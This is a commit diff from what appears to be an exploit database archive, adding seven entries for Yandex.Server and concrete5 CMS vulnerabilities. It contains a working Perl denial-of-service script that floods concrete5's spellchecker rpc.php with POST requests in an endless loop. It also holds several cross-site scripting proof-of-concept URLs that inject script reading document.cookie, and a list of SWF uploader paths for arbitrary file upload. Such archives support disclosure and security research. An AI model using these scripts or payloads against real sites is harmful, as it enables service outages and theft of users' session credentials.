DB: 2015-06-08

7 new exploits
2015-06-08 05:03:42 +00:00 · 2015-06-08 05:03:42 +00:00 · 6a755b7b3d
commit 6a755b7b3d
parent 5cd9f850c3
8 changed files with 153 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33601,3 +33601,10 @@ id,file,description,date,author,platform,type,port
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0
 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
+37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0
+37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0
+37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0
+37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
--- a/platforms/php/webapps/37224.txt
+++ b/platforms/php/webapps/37224.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53622/info
+
+Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search/?text=%27);alert(document.cookie)// 
--- a/platforms/php/webapps/37225.pl
+++ b/platforms/php/webapps/37225.pl
@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+#### p0c 2 [ DDos with RPC 'using simple PERL script]===>
+
+#!/usr/bin/perl
+
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<66; $i--)
+{
+$user="w00t".$rand.$i;
+$data = "Aa"
+;
+$lenx = length $data;
+$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
+"Accept: */*\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $lenx\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$rpc", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "\tusage: \n";
+print "\t$0 <host> </dir/>\n";
+print "\Ex: $0 127.0.0.1 /concrete/\n";
+print "\Ex2: $0 target.com /\n\n";
+exit();
+};
+
+# << ThE|End
--- a/platforms/php/webapps/37226.txt
+++ b/platforms/php/webapps/37226.txt
@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/53640/info
+ 
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+ 
+1. Multiple cross-site scripting vulnerabilities
+ 
+2. An arbitrary-file-upload vulnerability
+ 
+3. A denial-of-service vulnerability
+ 
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+
+http://www.example.com/concrete/flash/thumbnail_editor_2.swf
+http://www.example.com/concrete/flash/thumbnail_editor_3.swf
+http://www.example.com/concrete/flash/swfupload/swfupload.swf
+http://www.example.com/concrete/flash/uploader/uploader.swf
--- a/platforms/php/webapps/37227.txt
+++ b/platforms/php/webapps/37227.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+  
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+  
+1. Multiple cross-site scripting vulnerabilities
+  
+2. An arbitrary-file-upload vulnerability
+  
+3. A denial-of-service vulnerability
+  
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4
--- a/platforms/php/webapps/37228.txt
+++ b/platforms/php/webapps/37228.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+   
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+   
+1. Multiple cross-site scripting vulnerabilities
+   
+2. An arbitrary-file-upload vulnerability
+   
+3. A denial-of-service vulnerability
+   
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned
--- a/platforms/php/webapps/37229.txt
+++ b/platforms/php/webapps/37229.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+    
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+    
+1. Multiple cross-site scripting vulnerabilities
+    
+2. An arbitrary-file-upload vulnerability
+    
+3. A denial-of-service vulnerability
+    
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned
--- a/platforms/php/webapps/37230.txt
+++ b/platforms/php/webapps/37230.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+     
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+     
+1. Multiple cross-site scripting vulnerabilities
+     
+2. An arbitrary-file-upload vulnerability
+     
+3. A denial-of-service vulnerability
+     
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=